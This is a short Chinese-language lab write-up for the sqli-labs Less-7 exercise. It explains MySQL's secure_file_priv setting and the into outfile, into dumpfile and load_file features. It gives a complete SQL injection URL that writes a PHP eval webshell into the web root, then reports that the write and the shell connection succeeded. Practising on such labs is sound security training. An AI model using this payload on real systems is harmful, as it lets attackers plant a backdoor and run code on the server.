【靶场训练】sql-libs_less-7

less-6可用less-5的方法做，区别是less-6采用双引号闭合。

less-7 用into outfile向服务器写入webshell

查看文件写入权限：show global variables like '%secure%';

secure_file_priv选项

secure_file_priv 

　　1、限制mysqld 不允许导入 | 导出
　   　   --secure_file_prive=null

　　2、限制mysqld 的导入 | 导出 只能发生在/tmp/目录下
　　　   --secure_file_priv=/tmp/

　　3、不对mysqld 的导入 | 导出做限制
              --secure_file_priv= 

into dumpfile:只能写一行，并且输出中不存在任何格式。

into outfile:可以写入多行数据，并且字段和行终止符都可以作为格式输出。

load_file:向服务器读文件

into outfile使用的三个条件：

1.具有root权限。

2.在数据库配置文件中的 配置项含有：secure_file_priv=''。（注意在数据库中此项默认为secure_file_priv=null）。

3.知道数据库的绝对路径。

http://192.168.48.149/sql/Less-7/?id=-1')) union select 1,"<?php eval(@$_POST['lq']); ?>" ,3 into outfile "C://wamp//www//sql//Less-7//1.php" -- lq

前提的知道网站绝对路径实战中

 

写入成功

连接成功